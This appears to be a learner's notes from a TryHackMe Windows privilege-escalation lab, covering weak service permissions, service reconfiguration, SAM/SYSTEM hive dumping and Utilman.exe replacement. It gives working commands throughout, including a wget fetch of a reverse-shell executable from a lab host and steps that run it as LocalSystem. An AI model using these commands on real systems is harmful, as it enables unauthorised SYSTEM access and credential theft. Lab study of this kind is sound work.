# Windows Privilege ###### tags: `tryhackme` `windows` `privilege` [TOC] # Insecurity permission ``` sc qc WindowsScheduler ```  Check the file permission. ``` icacls <file name> ```  - Everyone can modify - So we could try to replace our rev-shell with the associated executable Download reverse shell ``` wget http://10.17.11.72:8000/rev-svc.exe -O rev-svc.exe ```  ---  ## Trigger ### Powershell ``` sc.exe stop windowsscheduler ``` ``` sc.exe start windowsscheduler ``` ### CMD  ## Unquoted Service Paths   --- ### Practice  --- check permission  AD（Administrative Privileges） WD(Windows Privileges) ``` mv .\rev-svc2.exe C:\MyPrograms\Disk.exe //setting permiison icacls C:\MyPrograms\Disk.exe /grant Everyone:F sc.exe stop "disk sorter enterprise" sc.exe start "disk sorter enterprise" ```   ## insecurity service permission Check: NO path vulnerability  NO executable vulnerability  ## check service's configuration permission ``` PS C:\tools> .\AccessChk\accesschk.exe -qlc thmservice ```  ``` PS C:\tools> icacls .\rev-svc3.exe /grant Everyone:F ``` ``` PS C:\tools> sc.exe config THMservice binPath= "C:\tools\rev-svc3.exe" obj=LocalSystem ```  ---  ---  ---  # Danger privilege ## SetBackup/setReset backup ``` #back up System hash reg save hklm\\system C:\\Users\\THMBackup\\system.hive #back up SAM hash reg save hklm\sam C:\Users\THMBackup\sam.hive ```  ## SeTackOwnerShip ``` whoami /priv ```  Abuse `utilman.exe`  utilman.exe run with SYSTEM privileges we could try to replace the original binary with the cmd.exe we will get the systems privilege ``` takeown /f C:\Windows\System32\Utilman.exe ```  --- Assign full permission to us ``` icacls C:\Windows\System32\Utilman.exe /grant THMTakeOwnership:F ```    ``` not return all installed programs ```